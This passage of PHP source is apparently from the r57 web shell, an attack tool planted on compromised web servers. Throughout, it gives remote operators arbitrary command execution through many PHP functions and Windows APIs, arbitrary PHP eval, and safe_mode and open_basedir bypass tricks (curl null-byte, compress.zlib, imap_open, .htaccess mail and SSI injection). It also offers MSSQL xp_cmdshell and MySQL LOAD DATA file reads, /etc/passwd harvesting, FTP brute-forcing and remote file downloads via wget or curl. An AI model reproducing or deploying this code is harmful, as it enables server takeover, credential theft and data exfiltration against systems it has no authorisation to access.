            $_POST['dir']."/".$nfn)
      or print("<font color=#DF0000 face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
}
if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
{
 switch($_POST['with'])
 {
 case wget:
 $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
 break;
 case fetch:
 $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
 break;
 case lynx:
 $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
 break;
 case links:
 $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
 break;
 case GET:
 $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
 break;
 case curl:
 $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
 break;
 }
}
if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
 {
 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
 if(empty($ftp_port)) { $ftp_port = 21; }
 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
 if(!$connection) { err(3); }
 else
  {
  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
  else
   {
   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);	}
   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);	}
   }
  }
 @ftp_close($connection);
 $_POST['cmd'] = "";
 }
if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
 {
 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
 if(empty($ftp_port)) { $ftp_port = 21; }
 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
 if(!$connection) { err(3); $_POST['cmd'] = ""; }
 else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><font color=#DF0000 face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
 @ftp_close($connection);
 }
echo $table_up3;
if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td class=main><b><div align=center><textarea name=report cols=121 rows=15 spellcheck='false'>";

function dozip1($link,$file)
{
   $fp = @fopen($link,"r");
   while(!feof($fp))
   {
       $cont.= fread($fp,1024);
   }
   fclose($fp);

   $fp2 = @fopen($file,"w");
   fwrite($fp2,$cont);
   fclose($fp2);
}
if (isset($_POST['funzip']))
{
dozip1($_POST['funzip'],$_POST['fzip']);
}
if(empty($_POST['root'])){
} else {
   $root = $_POST['root']; }




  $c = 0; $D = array();
  set_error_handler("eh");

  $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";

  for($i=0; $i < strlen($chars); $i++){
  $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";

  $prevD = $D[count($D)-1];
  glob($path."*");

        if($D[count($D)-1] != $prevD){

        for($j=0; $j < strlen($chars); $j++){

           $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";

           $prevD2 = $D[count($D)-1];
           glob($path."*");

              if($D[count($D)-1] != $prevD2){


                 for($p=0; $p < strlen($chars); $p++){

                 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";

                 $prevD3 = $D[count($D)-1];
                 glob($path."*");

                    if($D[count($D)-1] != $prevD3){


                       for($r=0; $r < strlen($chars); $r++){

                       $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
                       glob($path."*");

                       }

                    }

                 }

              }

        }

        }

  }

  $D = array_unique($D);




  foreach($D as $item)
  if(isset($_REQUEST['root']))
  echo "{$item}\n";




  function eh($errno, $errstr, $errfile, $errline){

     global $D, $c, $i;
     preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
     if($o){ $D[$c] = $o[2]; $c++;}

  }

if($safe_mode)
{
 switch($_POST['cmd'])
 {
 case 'safe_dir':
  $d=@dir($dir);
  if ($d)
   {
   while (false!==($file=$d->read()))
    {
     if ($file=="." || $file=="..") continue;
     @clearstatcache();
     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
     if(!$unix){
     echo date("d.m.Y H:i",$mtime);
     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
     }
     else{
     $owner = @posix_getpwuid($uid);
     $grgid = @posix_getgrgid($gid);
     echo $inode." ";
     echo perms(@fileperms($file));
     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
     echo date("d.m.Y H:i ",$mtime);
     }
     echo "$file\n";
    }
   $d->close();
   }
  else echo $lang[$language._text29];
 break;
  case 'test1':
  $ci = @curl_init("file://".$_POST['test1_file']."");
  $cf = @curl_exec($ci);
  echo $cf;
  break;
  case 'test2':
  @include($_POST['test2_file']);
  break;
  case 'test4':
  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
  if($db)
   {
   if(@mssql_select_db($_POST['test4_md'],$db))
    {
     @mssql_query("drop table r57_temp_table",$db);
     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
     $res = mssql_query("select * from r57_temp_table",$db);
     while(($row=@mssql_fetch_row($res)))
      {
      echo $row[0]."\r\n";
      }
    @mssql_query("drop table r57_temp_table",$db);
    }
    else echo "[-] ERROR! Can't select database";
   @mssql_close($db);
   }
  else echo "[-] ERROR! Can't connect to MSSQL server";
  break;
  case 'test5':
  if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
  $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
  $lines = file ('/tmp/mb_send_mail');
  foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
  break;
  case 'test6':
  $stream = @imap_open('/etc/passwd', "", "");
  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
  for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
  @imap_close($stream);
  break;
  case 'test7':
  $stream = @imap_open($_POST['test7_file'], "", "");
  $str = @imap_body($stream, 1);
  echo $str;
  @imap_close($stream);
  break;
  case 'test8':
  if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
  else echo $lang[$language.'_text119'];
  break;
case 'cURL':
   if(empty($_POST['SnIpEr_SA'])){


} else {
$curl=$_POST['SnIpEr_SA'];
$ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
echo "</textarea></CENTER>";

}
break;
case 'copy':

if(empty($snn)){
if(empty($_GET['snn'])){
if(empty($_POST['snn'])){

} else {
$u1p=$_POST['snn'];
}
} else {
$u1p=$_GET['snn'];
}
}
  $u1p=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp


$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$snn, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "".htmlspecialchars($tekst)."";
unlink($temp);
echo "</textarea></CENTER>";
}
break;
case 'ini_restore':
 if(empty($_POST['ini_restore'])){
} else {

$ini=$_POST['ini_restore'];
echo ini_get("safe_mode");
echo ini_get("open_basedir");
require_once("$ini");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
echo "</textarea></CENTER>";
}
break;
case 'glob':
function reg_glob()
{
$chemin=$_REQUEST['glob'];
$files = glob("$chemin*");


foreach ($files as $filename) {

   echo "$filename\n";

}
}

if(isset($_REQUEST['glob']))
{
reg_glob();
}

break;
case 'zend':
 if(empty($_POST['zend'])){
} else {

$dezend=$_POST['zend'];
include($_POST['zend']);
print_r($GLOBALS);
require_once("$dezend");
echo "</textarea></p>";
}
break;
  case 'plugin':
  if ($_POST['plugin'] ){


                                           for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
                                        $ara = posix_getpwuid($uid);
                                                if (!empty($ara)) {
                                                  while (list ($key, $val) = each($ara)){
                                                    print "$val:";
                                                  }
                                                  print "\n";
                                                }
                                        }
                                 echo "</textarea>";

             }
        break;
        case 'command':
          if (!empty($_POST['command'])) {

                if ($method=="system") {
                system($_POST['command']);
                echo "Functions system";
                }
                if ($method=="passthru") {
                passthru($_POST['command']);
                echo "Functions passthru";
                }
                if ($method=="exec") {
                        $string = exec($_POST['command']);
                        echo $string;
                        echo "Functions exec";

                }
                if ($method=="shell_exec") {
                $string = shell_exec($_POST['command']);
                echo $string;
                echo "Functions shell_exec";
                }
                if ($method=="popen") {
                $pp = popen($_POST['command'], 'r');
                $read = fread($pp, 2096);
                echo $read;
                pclose($pp);
                echo "Functions popen";
                  }

	  if ($method=="proc_open") {


$command  = isset($_POST['command'])  ? $_POST['command']  : '';



/* Load the configuration. */

/* Default settings --- these settings should always be set to something. */

/* Merge settings. */

session_start();



    if (!empty($command)) {
        /* Save the command for late use in the JavaScript.  If the command is
         * already in the history, then the old entry is removed before the
         * new entry is put into the list at the front. */
        if (($i = array_search($_POST['command'], $_SESSION['history'])) !== false)
            unset($_SESSION['history'][$i]);

        array_unshift($_SESSION['history'], $_POST['command']);

        /* Now append the commmand to the output. */
        $_SESSION['output'] .= '$ ' . $_POST['command'] . "\n";

        /* Initialize the current working directory. */
        if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_POST['command'])) {
            $_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
        } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_POST['command'], $regs)) {
            /* The current command is a 'cd' command which we have to handle
             * as an internal shell command. */

            if ($regs[1]{0} == '/') {
                /* Absolute path, we use it unchanged. */
                $new_dir = $regs[1];
            } else {
                /* Relative path, we append it to the current working
                 * directory. */
                $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
            }

            /* Transform '/./' into '/' */
            while (strpos($new_dir, '/./') !== false)
                $new_dir = str_replace('/./', '/', $new_dir);

            /* Transform '//' into '/' */
            while (strpos($new_dir, '//') !== false)
                $new_dir = str_replace('//', '/', $new_dir);

            /* Transform 'x/..' into '' */
            while (preg_match('|/\.\.(?!\.)|', $new_dir))
                $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);

            if ($new_dir == '') $new_dir = '/';

            /* Try to change directory. */
            if (@chdir($new_dir)) {
                $_SESSION['cwd'] = $new_dir;
            } else {
                $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
            }

        } elseif (trim($_POST['command']) == 'exit') {
            logout();
        } else {

            /* The command is not an internal command, so we execute it after
             * changing the directory and save the output. */
            chdir($_SESSION['cwd']);

            // We canot use putenv() in safe mode.
            if (!ini_get('safe_mode')) {
                // Advice programs (ls for example) of the terminal size.
                putenv('ROWS=' . $rows);
                putenv('COLUMNS=' . $columns);
            }

            /* Alias expansion. */
            $length = strcspn($_POST['command'], " \t");
            $token = substr($_POST['command'], 0, $length);
            if (isset($ini['aliases'][$token]))
                $command = $ini['aliases'][$token] . substr($_POST['command'], $length);

            $io = array();
            $p = proc_open($_POST['command'],
                           array(1 => array('pipe', 'w'),
                                 2 => array('pipe', 'w')),
                           $io);

            /* Read output sent to stdout. */
            while (!feof($io[1])) {
                $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
                                                        ENT_COMPAT, 'UTF-8');
            }
            /* Read output sent to stderr. */
            while (!feof($io[2])) {
                $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
                                                        ENT_COMPAT, 'UTF-8');
            }

            fclose($io[1]);
            fclose($io[2]);
            proc_close($p);
        }
    }

    /* Build the command history for use in the JavaScript */
    if (empty($_SESSION['history'])) {
        $js_command_hist = '""';
    } else {
        $escaped = array_map('addslashes', $_SESSION['history']);
        $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
    }
               }
             		}


		break;
  case 'test10':
  @error_log($_POST['test10_content'], 3,"php://../../".$_POST['test10_file']);
  break;
  case 'test11':
  if(file_exists("./result.txt") && file_exists("./.htaccess"))
   {
   @unlink("./.htaccess");
   @unlink("./result.txt");
   }
   if ($handle = @fopen("./.htaccess", 'w')) { @fwrite($handle, "php_value mail.force_extra_parameters '-t && ".$_POST['test11_cmd']." > ".dirname($_SERVER["SCRIPT_FILENAME"])."/result.txt'"); mail("", "", ""); }
   //while(!file_exists(dirname($_SERVER["SCRIPT_FILENAME"])."/result.txt")) sleep(1);
   if($lines) foreach ($lines as $line) { echo htmlspecialchars($line); }
  break;
  case 'test12':
  if ($handle = @fopen("./.htaccess", 'w')) { @fwrite($handle, "AddType text/html .shtml\r\nAddHandler server-parsed .shtml\r\nOptions +Includes"); }
  if ($handle = @fopen("./cmdssi.shtml", 'w')) { @fwrite($handle, '<!--#exec cmd="'.$_POST['test12_cmd'].'"-->'); }
  // url_fopen ????? ???????? ??? ?????... ????? ?????? ????????? ??????
  @include("http://".$_SERVER['HTTP_HOST'].rtrim(dirname($_SERVER['PHP_SELF']),'/\\')."/cmdssi.shtml");
  break;
  case 'test13':
  $tmp = '';
  if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
  elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
  elseif(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
  elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
  else break;
  @unlink($tmp.'/result_test13.txt');
  $wscript = new COM('wscript.shell');
  $wscript->Run('cmd.exe /c "'.$_POST['test13_cmd'].'" > '.$tmp.'/result_test13.txt');
  while(!file_exists($tmp.'/result_test13.txt')) sleep(1);
  $lines = @file ($tmp.'/result_test13.txt');
  if($lines) foreach ($lines as $line) { echo htmlspecialchars($line); }
  @unlink($tmp.'/result_test13.txt');
  break;
  case 'test14':
  $ioncube = @ioncube_read_file($_POST['test14_cmd']);
  echo htmlspecialchars($ioncube);
  break;
  case 'test15':
  $tmp = '';
  if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
  elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
  elseif(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
  elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
  else break;
  @unlink($tmp.'/result_test15.txt');
  @win_shell_execute("cmd.exe","","/c ".$_POST['test15_cmd']." > ".$tmp."/result_test15.txt");
  while(!file_exists($tmp.'/result_test15.txt')) sleep(1);
  $lines = @file ($tmp.'/result_test15.txt');
  if($lines) foreach ($lines as $line) { echo htmlspecialchars($line); }
  @unlink($tmp.'/result_test15.txt');
  break;
  case 'test16':
  $tmp = '';
  if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
  elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
  if(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
  elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
  else break;
  $name=$tmp."\\".uniqid();
  $n=uniqid();
  $cmd=(empty($_SERVER['COMSPEC']))?'c:\\windows\\system32\\cmd.exe':$_SERVER['COMSPEC'];
  win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c ".$_POST['test16_cmd']." >\"$name\""));
  win32_start_service($n);
  win32_stop_service($n);
  win32_delete_service($n);
  while(!file_exists($name)) sleep(1);
  $exec=file_get_contents($name);
  unlink($name);
  echo htmlspecialchars($exec);
  break;
  case 'test17':
  $_POST['test17_cmd'] = str_replace('\\','\\\\',$_POST['test17_cmd']);
  $perl = new Perl();
  $perl->eval('print `'.$_POST['test17_cmd'].'`');
  break;
  case 'test18':
  if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
  elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
  if(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
  elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
  else break;
  $name=$tmp."\\".uniqid();
  $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  $res=$api->WinExec("cmd.exe /c ".$_POST['test18_cmd']." >\"$name\"",0);
  while(!file_exists($name)) sleep(1);
  $exec=file_get_contents($name);
  unlink($name);
  echo htmlspecialchars($exec);
  break;
 }
}
else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
 $cmd_rep = ex($_POST['cmd']);
 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
 else { echo @htmlspecialchars($cmd_rep)."\n"; }}
if ($_POST['cmd']=="UnKn0wN_mysql")
 {
  if(empty($_POST['test3_sr'])) { $_POST['test3_sr'] = "localhost"; }
  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
  $db = @mysql_connect($_POST['test3_sr'].':'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
  if($db)
   {
   if(@mysql_select_db($_POST['test3_md'],$db))
    {
     @mysql_query("DROP TABLE IF EXISTS UnKn0wN");
     @mysql_query("CREATE TABLE `UnKn0wN` ( `file` LONGBLOB NOT NULL )");
     @mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['test3_file'])."\" INTO TABLE UnKn0wN FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
     $r = @mysql_query("SELECT * FROM UnKn0wN");
     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
     @mysql_query("DROP TABLE IF EXISTS UnKn0wN");
    }
    else echo "[-] ERROR! Can't select database";
   @mysql_close($db);
   }
  else echo "[-] ERROR! Can't connect to mysql server";
 }
if ($_POST['cmd']=="ftp_brute")
 {
 $suc = 0;
 foreach($users as $user)
  {
  $connection = @ftp_connect($ftp_server,$ftp_port,10);
  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
  @ftp_close($connection);
  }
 echo "\r\n-------------------------------------\r\n";
 $count = count($users);
 if(isset($_POST['reverse'])) { $count *= 2; }
 echo $lang[$language.'_text97'].$count."\r\n";
 echo $lang[$language.'_text98'].$suc."\r\n";
 }
if ($_POST['cmd']=="php_eval"){
 $eval = @str_replace("<?","",$_POST['php_eval']);
 $eval = @str_replace("?>","",$eval);
 eval($eval);}
if ($_POST['cmd']=="mysql_dump")
 {
  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
  $sql = new my_sql();
  $sql->db   = $_POST['db'];
  $sql->host = $_POST['db_server'];
  $sql->port = $_POST['db_port'];
  $sql->user = $_POST['mysql_l'];
  $sql->pass = $_POST['mysql_p'];
  $sql->base = $_POST['mysql_db'];
  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
  else {
   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
   else { echo "[-] ERROR! Can't write in dump file"; }
   }
 }
echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";
function div_title($title, $id)
{
  return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
}
function div($id)
 {
 if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
 return '<div id="'.$id.'">';
 }
if(!$safe_mode){
echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
else{
echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
echo $te.'</div>'.$table_end1.$fe;

echo $fs.$table_up1.div_title($lang[$language.'_text208'],'id15').$table_up2.div('id15').$ts;
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select name=\"method\">

                            <option value=\"system\" <? if ($method==\"system\") { echo \"selected\"; } ?>system</option>
                            <option value=\"passthru\" <? if ($method==\"passthru\") { echo \"selected\"; } ?>passthru</option>
                            <option value=\"exec\" <? if ($method==\"exec\") { echo \"selected\"; } ?>exec</option>
                            <option value=\"shell_exec\" <? if ($method==\"shell_exec\") { echo \"selected\"; } ?>shell_exec</option>
                            <option value=\"popen\" <? if ($method==\"popen\") { echo \"selected\"; } ?>popen</option>
                            <option value=\"proc_open\" <? if ($method==\"proc_open\") { echo \"selected\"; } ?>proc_open</option>

                      </select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text3'].$arrow."</b>".in('text','command',54,(!empty($_POST['command'])?($_POST['command']):("id"))).in('hidden','cmd',0,'command').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;



echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id411').$table_up2.div('id411').$ts;
echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id511').$table_up2.div('id511').$ts;
echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
echo $te.'</div>'.$table_end1.$fe;
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text204'],'id204').$table_up2.div('id204').$ts;
echo sr(15,"<b>".$lang[$language.'_text226'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):('../../file.php'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10'));
echo sr(15,"<b>".$lang[$language.'_text227'].$arrow."</b>",in('text','test10_content',96,(!empty($_POST['test10_content'])?($_POST['test10_content']):('<? echo \'gotcha\'; ?>'))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;  
}

if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text225'],'id225').$table_up2.div('id225').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test11_cmd',96,(!empty($_POST['test11_cmd'])?($_POST['test11_cmd']):('ls -la'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;  
}

if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text228'],'id228').$table_up2.div('id228').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test12_cmd',96,(!empty($_POST['test12_cmd'])?($_POST['test12_cmd']):('ls -la'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;  
}

if($safe_mode&&!$unix)
{
echo $fs.$table_up1.div_title($lang[$language.'_text229'],'id229').$table_up2.div('id229').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test13_cmd',96,(!empty($_POST['test13_cmd'])?($_POST['test13_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;  
}

if($safe_mode&&extension_loaded("ionCube Loader"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text230'],'id230').$table_up2.div('id230').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test14_cmd',96,(!empty($_POST['test14_cmd'])?($_POST['test14_cmd']):('../../boot.ini'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;  
}

if($safe_mode&&!$unix&&extension_loaded("win32std"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text231'],'id231').$table_up2.div('id231').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test15_cmd',96,(!empty($_POST['test15_cmd'])?($_POST['test15_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;  
}

if($safe_mode&&!$unix&&extension_loaded("win32service"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text232'],'id232').$table_up2.div('id232').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test16_cmd',96,(!empty($_POST['test16_cmd'])?($_POST['test16_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;  
}

if($safe_mode&&extension_loaded("perl"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text131'],'id34').$table_up2.div('id233').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test17_cmd',96,(!empty($_POST['test17_cmd'])?($_POST['test17_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;  
}

if($safe_mode&&!$unix&&extension_loaded("ffi"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text132'],'id35').$table_up2.div('id234').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test18_cmd',96,(!empty($_POST['test18_cmd'])?($_POST['test18_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;  
}

if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id207').$table_up2.div('id207').$ts;
echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id209').$table_up2.div('id209').$ts;
echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;

echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id210').$table_up2.div('id210').$ts;
echo "<table class=table1 width=100% align=center>";
